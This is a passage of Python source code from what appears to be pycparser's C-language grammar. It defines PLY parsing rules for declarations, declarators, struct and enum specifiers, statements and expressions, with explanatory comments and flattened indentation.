""" translation_unit : translation_unit external_declaration
"""
p[1].extend(p[2])
p[0] = p[1]
# Declarations always come as lists (because they can be
# several in one line), so we wrap the function definition
# into a list as well, to make the return value of
# external_declaration homogenous.
#
def p_external_declaration_1(self, p):
""" external_declaration : function_definition
"""
p[0] = [p[1]]
def p_external_declaration_2(self, p):
""" external_declaration : declaration
"""
p[0] = p[1]
def p_external_declaration_3(self, p):
""" external_declaration : pp_directive
| pppragma_directive
"""
p[0] = [p[1]]
def p_external_declaration_4(self, p):
""" external_declaration : SEMI
"""
p[0] = []
def p_pp_directive(self, p):
""" pp_directive : PPHASH
"""
self._parse_error('Directives not supported yet',
self._token_coord(p, 1))
def p_pppragma_directive(self, p):
""" pppragma_directive : PPPRAGMA
| PPPRAGMA PPPRAGMASTR
"""
if len(p) == 3:
p[0] = c_ast.Pragma(p[2], self._token_coord(p, 2))
else:
p[0] = c_ast.Pragma("", self._token_coord(p, 1))
# In function definitions, the declarator can be followed by
# a declaration list, for old "K&R style" function definitios.
#
def p_function_definition_1(self, p):
""" function_definition : id_declarator declaration_list_opt compound_statement
"""
# no declaration specifiers - 'int' becomes the default type
spec = dict(
qual=[],
storage=[],
type=[c_ast.IdentifierType(['int'],
coord=self._token_coord(p, 1))],
function=[])
p[0] = self._build_function_definition(
spec=spec,
decl=p[1],
param_decls=p[2],
body=p[3])
def p_function_definition_2(self, p):
""" function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement
"""
spec = p[1]
p[0] = self._build_function_definition(
spec=spec,
decl=p[2],
param_decls=p[3],
body=p[4])
def p_statement(self, p):
""" statement : labeled_statement
| expression_statement
| compound_statement
| selection_statement
| iteration_statement
| jump_statement
| pppragma_directive
| comment_cond_statement
"""
p[0] = p[1]
# A pragma is generally considered a decorator rather than an actual statement.
# Still, for the purposes of analyzing an abstract syntax tree of C code,
# pragma's should not be ignored and were previously treated as a statement.
# This presents a problem for constructs that take a statement such as labeled_statements,
# selection_statements, and iteration_statements, causing a misleading structure
# in the AST. For example, consider the following C code.
#
# for (int i = 0; i < 3; i++)
# #pragma omp critical
# sum += 1;
#
# This code will compile and execute "sum += 1;" as the body of the for loop.
# Previous implementations of PyCParser would render the AST for this
# block of code as follows:
#
# For:
# DeclList:
# Decl: i, [], [], []
# TypeDecl: i, []
# IdentifierType: ['int']
# Constant: int, 0
# BinaryOp: <
# ID: i
# Constant: int, 3
# UnaryOp: p++
# ID: i
# Pragma: omp critical
# Assignment: +=
# ID: sum
# Constant: int, 1
#
# This AST misleadingly takes the Pragma as the body of the loop and the
# assignment then becomes a sibling of the loop.
#
# To solve edge cases like these, the pragmacomp_or_statement rule groups
# a pragma and its following statement (which would otherwise be orphaned)
# using a compound block, effectively turning the above code into:
#
# for (int i = 0; i < 3; i++) {
# #pragma omp critical
# sum += 1;
# }
def p_pragmacomp_or_statement(self, p):
""" pragmacomp_or_statement : pppragma_directive statement
| statement
"""
if isinstance(p[1], c_ast.Pragma) and len(p) == 3:
p[0] = c_ast.Compound(
block_items=[p[1], p[2]],
coord=self._token_coord(p, 1))
else:
p[0] = p[1]
# In C, declarations can come several in a line:
# int x, *px, romulo = 5;
#
# However, for the AST, we will split them to separate Decl
# nodes.
#
# This rule splits its declarations and always returns a list
# of Decl nodes, even if it's one element long.
#
def p_decl_body(self, p):
""" decl_body : declaration_specifiers init_declarator_list_opt
| declaration_specifiers_no_type id_init_declarator_list_opt
"""
spec = p[1]
# p[2] (init_declarator_list_opt) is either a list or None
#
if p[2] is None:
# By the standard, you must have at least one declarator unless
# declaring a structure tag, a union tag, or the members of an
# enumeration.
#
ty = spec['type']
s_u_or_e = (c_ast.Struct, c_ast.Union, c_ast.Enum)
if len(ty) == 1 and isinstance(ty[0], s_u_or_e):
decls = [c_ast.Decl(
name=None,
quals=spec['qual'],
storage=spec['storage'],
funcspec=spec['function'],
type=ty[0],
init=None,
bitsize=None,
coord=ty[0].coord)]
# However, this case can also occur on redeclared identifiers in
# an inner scope. The trouble is that the redeclared type's name
# gets grouped into declaration_specifiers; _build_declarations
# compensates for this.
#
else:
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=None, init=None)],
typedef_namespace=True)
else:
decls = self._build_declarations(
spec=spec,
decls=p[2],
typedef_namespace=True)
p[0] = decls
# The declaration has been split to a decl_body sub-rule and
# SEMI, because having them in a single rule created a problem
# for defining typedefs.
#
# If a typedef line was directly followed by a line using the
# type defined with the typedef, the type would not be
# recognized. This is because to reduce the declaration rule,
# the parser's lookahead asked for the token after SEMI, which
# was the type from the next line, and the lexer had no chance
# to see the updated type symbol table.
#
# Splitting solves this problem, because after seeing SEMI,
# the parser reduces decl_body, which actually adds the new
# type into the table to be seen by the lexer before the next
# line is reached.
def p_declaration(self, p):
""" declaration : decl_body SEMI
"""
p[0] = p[1]
# Since each declaration is a list of declarations, this
# rule will combine all the declarations and return a single
# list
#
def p_declaration_list(self, p):
""" declaration_list : declaration
| declaration_list declaration
"""
p[0] = p[1] if len(p) == 2 else p[1] + p[2]
# To know when declaration-specifiers end and declarators begin,
# we require declaration-specifiers to have at least one
# type-specifier, and disallow typedef-names after we've seen any
# type-specifier. These are both required by the spec.
#
def p_declaration_specifiers_no_type_1(self, p):
""" declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'qual')
def p_declaration_specifiers_no_type_2(self, p):
""" declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'storage')
def p_declaration_specifiers_no_type_3(self, p):
""" declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt
"""
p[0] = self._add_declaration_specifier(p[2], p[1], 'function')
def p_declaration_specifiers_1(self, p):
""" declaration_specifiers : declaration_specifiers type_qualifier
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True)
def p_declaration_specifiers_2(self, p):
""" declaration_specifiers : declaration_specifiers storage_class_specifier
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'storage', append=True)
def p_declaration_specifiers_3(self, p):
""" declaration_specifiers : declaration_specifiers function_specifier
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'function', append=True)
def p_declaration_specifiers_4(self, p):
""" declaration_specifiers : declaration_specifiers type_specifier_no_typeid
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True)
def p_declaration_specifiers_5(self, p):
""" declaration_specifiers : type_specifier
"""
p[0] = self._add_declaration_specifier(None, p[1], 'type')
def p_declaration_specifiers_6(self, p):
""" declaration_specifiers : declaration_specifiers_no_type type_specifier
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True)
def p_storage_class_specifier(self, p):
""" storage_class_specifier : AUTO
| REGISTER
| STATIC
| EXTERN
| TYPEDEF
"""
p[0] = p[1]
def p_function_specifier(self, p):
""" function_specifier : INLINE
"""
p[0] = p[1]
def p_type_specifier_no_typeid(self, p):
""" type_specifier_no_typeid : VOID
| _BOOL
| CHAR
| SHORT
| INT
| LONG
| FLOAT
| DOUBLE
| _COMPLEX
| SIGNED
| UNSIGNED
| __INT128
"""
p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1))
def p_type_specifier(self, p):
""" type_specifier : typedef_name
| enum_specifier
| struct_or_union_specifier
| type_specifier_no_typeid
"""
p[0] = p[1]
def p_type_qualifier(self, p):
""" type_qualifier : CONST
| RESTRICT
| VOLATILE
"""
p[0] = p[1]
def p_init_declarator_list(self, p):
""" init_declarator_list : init_declarator
| init_declarator_list COMMA init_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# Returns a {decl=<declarator> : init=<initializer>} dictionary
# If there's no initializer, uses None
#
def p_init_declarator(self, p):
""" init_declarator : declarator
| declarator EQUALS initializer
"""
p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None))
def p_id_init_declarator_list(self, p):
""" id_init_declarator_list : id_init_declarator
| id_init_declarator_list COMMA init_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
def p_id_init_declarator(self, p):
""" id_init_declarator : id_declarator
| id_declarator EQUALS initializer
"""
p[0] = dict(decl=p[1], init=(p[3] if len(p) > 2 else None))
# Require at least one type specifier in a specifier-qualifier-list
#
def p_specifier_qualifier_list_1(self, p):
""" specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'type', append=True)
def p_specifier_qualifier_list_2(self, p):
""" specifier_qualifier_list : specifier_qualifier_list type_qualifier
"""
p[0] = self._add_declaration_specifier(p[1], p[2], 'qual', append=True)
def p_specifier_qualifier_list_3(self, p):
""" specifier_qualifier_list : type_specifier
"""
p[0] = self._add_declaration_specifier(None, p[1], 'type')
def p_specifier_qualifier_list_4(self, p):
""" specifier_qualifier_list : type_qualifier_list type_specifier
"""
spec = dict(qual=p[1], storage=[], type=[], function=[])
p[0] = self._add_declaration_specifier(spec, p[2], 'type', append=True)
# TYPEID is allowed here (and in other struct/enum related tag names), because
# struct/enum tags reside in their own namespace and can be named the same as types
#
def p_struct_or_union_specifier_1(self, p):
""" struct_or_union_specifier : struct_or_union ID
| struct_or_union TYPEID
"""
klass = self._select_struct_union_class(p[1])
# None means no list of members
p[0] = klass(
name=p[2],
decls=None,
coord=self._token_coord(p, 2))
def p_struct_or_union_specifier_2(self, p):
""" struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close
| struct_or_union brace_open brace_close
"""
klass = self._select_struct_union_class(p[1])
if len(p) == 4:
# Empty sequence means an empty list of members
p[0] = klass(
name=None,
decls=[],
coord=self._token_coord(p, 2))
else:
p[0] = klass(
name=None,
decls=p[3],
coord=self._token_coord(p, 2))
def p_struct_or_union_specifier_3(self, p):
""" struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close
| struct_or_union ID brace_open brace_close
| struct_or_union TYPEID brace_open struct_declaration_list brace_close
| struct_or_union TYPEID brace_open brace_close
"""
klass = self._select_struct_union_class(p[1])
if len(p) == 5:
# Empty sequence means an empty list of members
p[0] = klass(
name=p[2],
decls=[],
coord=self._token_coord(p, 2))
else:
p[0] = klass(
name=p[2],
decls=p[4],
coord=self._token_coord(p, 2))
def p_struct_or_union(self, p):
""" struct_or_union : STRUCT
| UNION
"""
p[0] = p[1]
# Combine all declarations into a single list
#
def p_struct_declaration_list(self, p):
""" struct_declaration_list : struct_declaration
| struct_declaration_list struct_declaration
"""
if len(p) == 2:
p[0] = p[1] or []
else:
p[0] = p[1] + (p[2] or [])
def p_struct_declaration_1(self, p):
""" struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI
"""
spec = p[1]
assert 'typedef' not in spec['storage']
if p[2] is not None:
decls = self._build_declarations(
spec=spec,
decls=p[2])
elif len(spec['type']) == 1:
# Anonymous struct/union, gcc extension, C1x feature.
# Although the standard only allows structs/unions here, I see no
# reason to disallow other types since some compilers have typedefs
# here, and pycparser isn't about rejecting all invalid code.
#
node = spec['type'][0]
if isinstance(node, c_ast.Node):
decl_type = node
else:
decl_type = c_ast.IdentifierType(node)
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=decl_type)])
else:
# Structure/union members can have the same names as typedefs.
# The trouble is that the member's name gets grouped into
# specifier_qualifier_list; _build_declarations compensates.
#
decls = self._build_declarations(
spec=spec,
decls=[dict(decl=None, init=None)])
p[0] = decls
def p_struct_declaration_2(self, p):
""" struct_declaration : SEMI
"""
p[0] = None
def p_struct_declaration_3(self, p):
""" struct_declaration : pppragma_directive
"""
p[0] = [p[1]]
def p_struct_declarator_list(self, p):
""" struct_declarator_list : struct_declarator
| struct_declarator_list COMMA struct_declarator
"""
p[0] = p[1] + [p[3]] if len(p) == 4 else [p[1]]
# struct_declarator passes up a dict with the keys: decl (for
# the underlying declarator) and bitsize (for the bitsize)
#
def p_struct_declarator_1(self, p):
""" struct_declarator : declarator
"""
p[0] = {'decl': p[1], 'bitsize': None}
def p_struct_declarator_2(self, p):
""" struct_declarator : declarator COLON constant_expression
| COLON constant_expression
"""
if len(p) > 3:
p[0] = {'decl': p[1], 'bitsize': p[3]}
else:
p[0] = {'decl': c_ast.TypeDecl(None, None, None), 'bitsize': p[2]}
def p_enum_specifier_1(self, p):
""" enum_specifier : ENUM ID
| ENUM TYPEID
"""
p[0] = c_ast.Enum(p[2], None, self._token_coord(p, 1))
def p_enum_specifier_2(self, p):
""" enum_specifier : ENUM brace_open enumerator_list brace_close
"""
p[0] = c_ast.Enum(None, p[3], self._token_coord(p, 1))
def p_enum_specifier_3(self, p):
""" enum_specifier : ENUM ID brace_open enumerator_list brace_close
| ENUM TYPEID brace_open enumerator_list brace_close
"""
p[0] = c_ast.Enum(p[2], p[4], self._token_coord(p, 1))
def p_enumerator_list(self, p):
""" enumerator_list : enumerator
| enumerator_list COMMA
| enumerator_list COMMA enumerator
"""
if len(p) == 2:
p[0] = c_ast.EnumeratorList([p[1]], p[1].coord)
elif len(p) == 3:
p[0] = p[1]
else:
p[1].enumerators.append(p[3])
p[0] = p[1]
def p_enumerator(self, p):
""" enumerator : ID
| ID EQUALS constant_expression
"""
if len(p) == 2:
enumerator = c_ast.Enumerator(
p[1], None,
self._token_coord(p, 1))
else:
enumerator = c_ast.Enumerator(
p[1], p[3],
self._token_coord(p, 1))
self._add_identifier(enumerator.name, enumerator.coord)
p[0] = enumerator
def p_declarator(self, p):
""" declarator : id_declarator
| typeid_declarator
"""
p[0] = p[1]
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_xxx_declarator_1(self, p):
""" xxx_declarator : direct_xxx_declarator
"""
p[0] = p[1]
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_xxx_declarator_2(self, p):
""" xxx_declarator : pointer direct_xxx_declarator
"""
p[0] = self._type_modify_decl(p[2], p[1])
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_direct_xxx_declarator_1(self, p):
""" direct_xxx_declarator : yyy
"""
p[0] = c_ast.TypeDecl(
declname=p[1],
type=None,
quals=None,
coord=self._token_coord(p, 1))
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'))
def p_direct_xxx_declarator_2(self, p):
""" direct_xxx_declarator : LPAREN xxx_declarator RPAREN
"""
p[0] = p[2]
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_direct_xxx_declarator_3(self, p):
""" direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET
"""
quals = (p[3] if len(p) > 5 else []) or []
# Accept dimension qualifiers
# Per C99 6.7.5.3 p7
arr = c_ast.ArrayDecl(
type=None,
dim=p[4] if len(p) > 5 else p[3],
dim_quals=quals,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_direct_xxx_declarator_4(self, p):
""" direct_xxx_declarator : direct_xxx_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET
| direct_xxx_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET
"""
# Using slice notation for PLY objects doesn't work in Python 3 for the
# version of PLY embedded with pycparser; see PLY Google Code issue 30.
# Work around that here by listing the two elements separately.
listed_quals = [item if isinstance(item, list) else [item]
for item in [p[3],p[4]]]
dim_quals = [qual for sublist in listed_quals for qual in sublist
if qual is not None]
arr = c_ast.ArrayDecl(
type=None,
dim=p[5],
dim_quals=dim_quals,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
# Special for VLAs
#
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_direct_xxx_declarator_5(self, p):
""" direct_xxx_declarator : direct_xxx_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[4], self._token_coord(p, 4)),
dim_quals=p[3] if p[3] != None else [],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
@parameterized(('id', 'ID'), ('typeid', 'TYPEID'), ('typeid_noparen', 'TYPEID'))
def p_direct_xxx_declarator_6(self, p):
""" direct_xxx_declarator : direct_xxx_declarator LPAREN parameter_type_list RPAREN
| direct_xxx_declarator LPAREN identifier_list_opt RPAREN
"""
func = c_ast.FuncDecl(
args=p[3],
type=None,
coord=p[1].coord)
# To see why _get_yacc_lookahead_token is needed, consider:
# typedef char TT;
# void foo(int TT) { TT = 10; }
# Outside the function, TT is a typedef, but inside (starting and
# ending with the braces) it's a parameter. The trouble begins with
# yacc's lookahead token. We don't know if we're declaring or
# defining a function until we see LBRACE, but if we wait for yacc to
# trigger a rule on that token, then TT will have already been read
# and incorrectly interpreted as TYPEID. We need to add the
# parameters to the scope the moment the lexer sees LBRACE.
#
if self._get_yacc_lookahead_token().type == "LBRACE":
if func.args is not None:
for param in func.args.params:
if isinstance(param, c_ast.EllipsisParam): break
self._add_identifier(param.name, param.coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_pointer(self, p):
""" pointer : TIMES type_qualifier_list_opt
| TIMES type_qualifier_list_opt pointer
"""
coord = self._token_coord(p, 1)
# Pointer decls nest from inside out. This is important when different
# levels have different qualifiers. For example:
#
# char * const * p;
#
# Means "pointer to const pointer to char"
#
# While:
#
# char ** const p;
#
# Means "const pointer to pointer to char"
#
# So when we construct PtrDecl nestings, the leftmost pointer goes in
# as the most nested type.
nested_type = c_ast.PtrDecl(quals=p[2] or [], type=None, coord=coord)
if len(p) > 3:
tail_type = p[3]
while tail_type.type is not None:
tail_type = tail_type.type
tail_type.type = nested_type
p[0] = p[3]
else:
p[0] = nested_type
def p_type_qualifier_list(self, p):
""" type_qualifier_list : type_qualifier
| type_qualifier_list type_qualifier
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
def p_parameter_type_list(self, p):
""" parameter_type_list : parameter_list
| parameter_list COMMA ELLIPSIS
"""
if len(p) > 2:
p[1].params.append(c_ast.EllipsisParam(self._token_coord(p, 3)))
p[0] = p[1]
def p_parameter_list(self, p):
""" parameter_list : parameter_declaration
| parameter_list COMMA parameter_declaration
"""
if len(p) == 2: # single parameter
p[0] = c_ast.ParamList([p[1]], p[1].coord)
else:
p[1].params.append(p[3])
p[0] = p[1]
# From ISO/IEC 9899:TC2, 6.7.5.3.11:
# "If, in a parameter declaration, an identifier can be treated either
# as a typedef name or as a parameter name, it shall be taken as a
# typedef name."
#
# Inside a parameter declaration, once we've reduced declaration specifiers,
# if we shift in an LPAREN and see a TYPEID, it could be either an abstract
# declarator or a declarator nested inside parens. This rule tells us to
# always treat it as an abstract declarator. Therefore, we only accept
# `id_declarator`s and `typeid_noparen_declarator`s.
def p_parameter_declaration_1(self, p):
""" parameter_declaration : declaration_specifiers id_declarator
| declaration_specifiers typeid_noparen_declarator
"""
spec = p[1]
if not spec['type']:
spec['type'] = [c_ast.IdentifierType(['int'],
coord=self._token_coord(p, 1))]
p[0] = self._build_declarations(
spec=spec,
decls=[dict(decl=p[2])])[0]
def p_parameter_declaration_2(self, p):
""" parameter_declaration : declaration_specifiers abstract_declarator_opt
"""
spec = p[1]
if not spec['type']:
spec['type'] = [c_ast.IdentifierType(['int'],
coord=self._token_coord(p, 1))]
# Parameters can have the same names as typedefs. The trouble is that
# the parameter's name gets grouped into declaration_specifiers, making
# it look like an old-style declaration; compensate.
#
if len(spec['type']) > 1 and len(spec['type'][-1].names) == 1 and \
self._is_type_in_scope(spec['type'][-1].names[0]):
decl = self._build_declarations(
spec=spec,
decls=[dict(decl=p[2], init=None)])[0]
# This truly is an old-style parameter declaration
#
else:
decl = c_ast.Typename(
name='',
quals=spec['qual'],
type=p[2] or c_ast.TypeDecl(None, None, None),
coord=self._token_coord(p, 2))
typename = spec['type']
decl = self._fix_decl_name_type(decl, typename)
p[0] = decl
def p_identifier_list(self, p):
""" identifier_list : identifier
| identifier_list COMMA identifier
"""
if len(p) == 2: # single parameter
p[0] = c_ast.ParamList([p[1]], p[1].coord)
else:
p[1].params.append(p[3])
p[0] = p[1]
def p_initializer_1(self, p):
""" initializer : assignment_expression
"""
p[0] = p[1]
def p_initializer_2(self, p):
""" initializer : brace_open initializer_list_opt brace_close
| brace_open initializer_list COMMA brace_close
"""
if p[2] is None:
p[0] = c_ast.InitList([], self._token_coord(p, 1))
else:
p[0] = p[2]
def p_initializer_list(self, p):
""" initializer_list : designation_opt initializer
| initializer_list COMMA designation_opt initializer
"""
if len(p) == 3: # single initializer
init = p[2] if p[1] is None else c_ast.NamedInitializer(p[1], p[2])
p[0] = c_ast.InitList([init], p[2].coord)
else:
init = p[4] if p[3] is None else c_ast.NamedInitializer(p[3], p[4])
p[1].exprs.append(init)
p[0] = p[1]
def p_designation(self, p):
""" designation : designator_list EQUALS
"""
p[0] = p[1]
# Designators are represented as a list of nodes, in the order in which
# they're written in the code.
#
def p_designator_list(self, p):
""" designator_list : designator
| designator_list designator
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
def p_designator(self, p):
""" designator : LBRACKET constant_expression RBRACKET
| PERIOD identifier
"""
p[0] = p[2]
def p_type_name(self, p):
""" type_name : specifier_qualifier_list abstract_declarator_opt
"""
typename = c_ast.Typename(
name='',
quals=p[1]['qual'],
type=p[2] or c_ast.TypeDecl(None, None, None),
coord=self._token_coord(p, 2))
p[0] = self._fix_decl_name_type(typename, p[1]['type'])
def p_abstract_declarator_1(self, p):
""" abstract_declarator : pointer
"""
dummytype = c_ast.TypeDecl(None, None, None)
p[0] = self._type_modify_decl(
decl=dummytype,
modifier=p[1])
def p_abstract_declarator_2(self, p):
""" abstract_declarator : pointer direct_abstract_declarator
"""
p[0] = self._type_modify_decl(p[2], p[1])
def p_abstract_declarator_3(self, p):
""" abstract_declarator : direct_abstract_declarator
"""
p[0] = p[1]
# Creating and using direct_abstract_declarator_opt here
# instead of listing both direct_abstract_declarator and the
# lack of it in the beginning of _1 and _2 caused two
# shift/reduce errors.
#
def p_direct_abstract_declarator_1(self, p):
""" direct_abstract_declarator : LPAREN abstract_declarator RPAREN """
p[0] = p[2]
def p_direct_abstract_declarator_2(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=p[3],
dim_quals=[],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_3(self, p):
""" direct_abstract_declarator : LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET
"""
quals = (p[2] if len(p) > 4 else []) or []
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=p[3] if len(p) > 4 else p[2],
dim_quals=quals,
coord=self._token_coord(p, 1))
def p_direct_abstract_declarator_4(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[3], self._token_coord(p, 3)),
dim_quals=[],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_5(self, p):
""" direct_abstract_declarator : LBRACKET TIMES RBRACKET
"""
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=c_ast.ID(p[3], self._token_coord(p, 3)),
dim_quals=[],
coord=self._token_coord(p, 1))
def p_direct_abstract_declarator_6(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN
"""
func = c_ast.FuncDecl(
args=p[3],
type=None,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_direct_abstract_declarator_7(self, p):
""" direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN
"""
p[0] = c_ast.FuncDecl(
args=p[2],
type=c_ast.TypeDecl(None, None, None),
coord=self._token_coord(p, 1))
# declaration is a list, statement isn't. To make it consistent, block_item
# will always be a list
#
def p_block_item(self, p):
""" block_item : declaration
| statement
"""
p[0] = p[1] if isinstance(p[1], list) else [p[1]]
# Since we made block_item a list, this just combines lists
#
def p_block_item_list(self, p):
""" block_item_list : block_item
| block_item_list block_item
"""
# Empty block items (plain ';') produce [None], so ignore them
p[0] = p[1] if (len(p) == 2 or p[2] == [None]) else p[1] + p[2]
def p_compound_statement_1(self, p):
""" compound_statement : brace_open block_item_list_opt brace_close """
p[0] = c_ast.Compound(
block_items=p[2],
coord=self._token_coord(p, 1))
def p_labeled_statement_1(self, p):
""" labeled_statement : ID COLON pragmacomp_or_statement """
p[0] = c_ast.Label(p[1], p[3], self._token_coord(p, 1))
def p_labeled_statement_2(self, p):
""" labeled_statement : CASE constant_expression COLON pragmacomp_or_statement """
p[0] = c_ast.Case(p[2], [p[4]], self._token_coord(p, 1))
def p_labeled_statement_3(self, p):
""" labeled_statement : DEFAULT COLON pragmacomp_or_statement """
p[0] = c_ast.Default([p[3]], self._token_coord(p, 1))
def p_selection_statement_1(self, p):
""" selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement """
p[0] = c_ast.If(p[3], p[5], None, self._token_coord(p, 1))
def p_selection_statement_2(self, p):
""" selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement """
p[0] = c_ast.If(p[3], p[5], p[7], self._token_coord(p, 1))
def p_selection_statement_3(self, p):
""" selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement """
p[0] = fix_switch_cases(
c_ast.Switch(p[3], p[5], self._token_coord(p, 1)))
def p_iteration_statement_1(self, p):
""" iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement """
p[0] = c_ast.While(p[3], p[5], self._token_coord(p, 1))
def p_iteration_statement_2(self, p):
""" iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI """
p[0] = c_ast.DoWhile(p[5], p[2], self._token_coord(p, 1))
def p_iteration_statement_3(self, p):
""" iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """
p[0] = c_ast.For(p[3], p[5], p[7], p[9], self._token_coord(p, 1))
def p_iteration_statement_4(self, p):
""" iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement """
p[0] = c_ast.For(c_ast.DeclList(p[3], self._token_coord(p, 1)),
p[4], p[6], p[8], self._token_coord(p, 1))
def p_jump_statement_1(self, p):
""" jump_statement : GOTO ID SEMI """
p[0] = c_ast.Goto(p[2], self._token_coord(p, 1))
def p_jump_statement_2(self, p):
""" jump_statement : BREAK SEMI """
p[0] = c_ast.Break(self._token_coord(p, 1))
def p_jump_statement_3(self, p):
""" jump_statement : CONTINUE SEMI """
p[0] = c_ast.Continue(self._token_coord(p, 1))
def p_jump_statement_4(self, p):
""" jump_statement : RETURN expression SEMI
| RETURN SEMI
"""
p[0] = c_ast.Return(p[2] if len(p) == 4 else None, self._token_coord(p, 1))
def p_expression_statement(self, p):
""" expression_statement : expression_opt SEMI """
if p[1] is None:
p[0] = c_ast.EmptyStatement(self._token_coord(p, 2))
else:
p[0] = p[1]
def p_expression(self, p):
""" expression : assignment_expression
| expression COMMA assignment_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
if not isinstance(p[1], c_ast.ExprList):
p[1] = c_ast.ExprList([p[1]], p[1].coord)
p[1].exprs.append(p[3])
p[0] = p[1]
def p_typedef_name(self, p):
""" typedef_name : TYPEID """
p[0] = c_ast.IdentifierType([p[1]], coord=self._token_coord(p, 1))
def p_assignment_expression(self, p):
""" assignment_expression : conditional_expression
| unary_expression assignment_operator assignment_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.Assignment(p[2], p[1], p[3], p[1].coord)
# K&R2 defines these as many separate rules, to encode
# precedence and associativity. Why work hard ? I'll just use
# the built in precedence/associativity specification feature
# of PLY. (see precedence declaration above)
#
def p_assignment_operator(self, p):
""" assignment_operator : EQUALS
| XOREQUAL
| TIMESEQUAL
| DIVEQUAL
| MODEQUAL
| PLUSEQUAL
| MINUSEQUAL
| LSHIFTEQUAL
| RSHIFTEQUAL
| ANDEQUAL
| OREQUAL
"""
p[0] = p[1]
def p_constant_expression(self, p):
""" constant_expression : conditional_expression """
p[0] = p[1]
def p_conditional_expression(self, p):
""" conditional_expression : binary_expression
| binary_expression CONDOP expression COLON conditional_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.TernaryOp(p[1], p[3], p[5], p[1].coord)
def p_binary_expression(self, p):
""" binary_expression : cast_expression
| binary_expression TIMES binary_expression
| binary_expression DIVIDE binary_expression
| binary_expression MOD binary_expression
| binary_expression PLUS binary_expression
| binary_expression MINUS binary_expression
| binary_expression RSHIFT binary_expression
| binary_expression LSHIFT binary_expression
| binary_expression LT binary_expression
| binary_expression LE binary_expression
| binary_expression GE binary_expression
| binary_expression GT binary_expression
| binary_expression EQ binary_expression
| binary_expression NE binary_expression
| binary_expression AND binary_expression
| binary_expression OR binary_expression
| binary_expression XOR binary_expression
| binary_expression LAND binary_expression
| binary_expression LOR binary_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.BinaryOp(p[2], p[1], p[3], p[1].coord)
def p_cast_expression_1(self, p):
""" cast_expression : unary_expression """
p[0] = p[1]
def p_cast_expression_2(self, p):
""" cast_expression : LPAREN type_name RPAREN cast_expression """
p[0] = c_ast.Cast(p[2], p[4], self._token_coord(p, 1))
